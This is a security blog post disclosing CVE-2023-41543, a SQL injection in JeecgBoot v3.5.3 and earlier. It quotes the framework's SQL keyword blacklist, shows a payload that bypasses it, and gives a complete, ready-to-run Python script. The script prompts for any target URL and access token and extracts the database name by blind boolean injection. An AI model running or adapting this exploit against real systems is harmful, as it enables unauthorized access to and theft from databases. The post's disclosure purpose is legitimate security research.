CVE-2023-41543(JeecgBoot Sql Injection)

Description

JEECG Boot v3.5.3 was discovered to contain a SQL injection in /sys/replicate/check

Affected version

JeecgBoot <= v3.5.3

Vulnerability Analysis

It was found that the framework has protected the original SQL injection by adding a blacklist. The blacklist is as follows:

“exec|peformance_schema|information_schema|extractvalue|updatexml|geohash|gtid_subset|gtid_subtract| insert | alter | delete | grant | update | drop | chr | mid | master | truncate | char | declare |user()|”;

Therefore, it is possible to directly construct payloads outside of the blacklist to bypass existing protective measures,As I mentioned in the report

1
1 'having {ascii}=(nullif (ascii (substring ((select database()), {place}, 1)), 0) or'

Exp

The complete utilization script is as follows

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
import requests
import json

def get_database(url,token):
    url=url+"/jeecg-boot/sys/duplicate/check?tableName=v3_hello&fieldVal=1&dataId=asd&fieldName="
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0',
        'Accept': 'application/json, text/plain, */*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'Referer': 'http://localhost:8088/jeecg-boot/jmreport/list',
        'X-Access-Token': 'null',
        'token': 'null',
        'JmReport-Tenant-Id': 'null',
        'Content-Type': 'application/json',
        'Connection': 'close',
        'Sec-Fetch-Dest': 'empty',
        'Sec-Fetch-Mode': 'no-cors',
        'Sec-Fetch-Site': 'same-origin',
        'Pragma': 'no-cache',
        'Cache-Control': 'no-cache'
    }
    headers["X_ACCESS_TOKEN"]=token
    length=1
    while True:
        payload=f"1   having 32<(nullif(ascii((substring((select database()),{length},1))),0))   "
        response=requests.get(url+payload,headers=headers)
        res=json.loads(response.text)
        if res["code"]!="200":
            break
        else:
            length+=1
    database=""
    for place in range(1,length):
        min=32
        max=128
        mid=(min+max)//2
        while min<max:
            payload=f"1   having {mid}<(nullif(ascii((substring((select database()),{place},1))),0)) "
            response=requests.get(url+payload,headers=headers)
            res=json.loads(response.text)
            if res["code"]=="200":
                min = mid + 1
            else:
                max = mid
            mid = (min + max) // 2
        database+=chr(mid)
    print(database)
# get_database("http://localhost:8088","")
url=input("please input your target: (example:http://localhost:8088)")
token=input("please input your X_ACCESS_TOKEN: ")
get_database(url,token)
CVE
#CVE #JeecgBoot #代码审计
CVE-2023-41543(JeecgBoot Sql Injection)
https://pho3n1x-web.github.io/2023/09/18/CVE-2023-41543(JeecgBoot_sql)/
Author
Pho3n1x
Posted on
September 18, 2023
Licensed under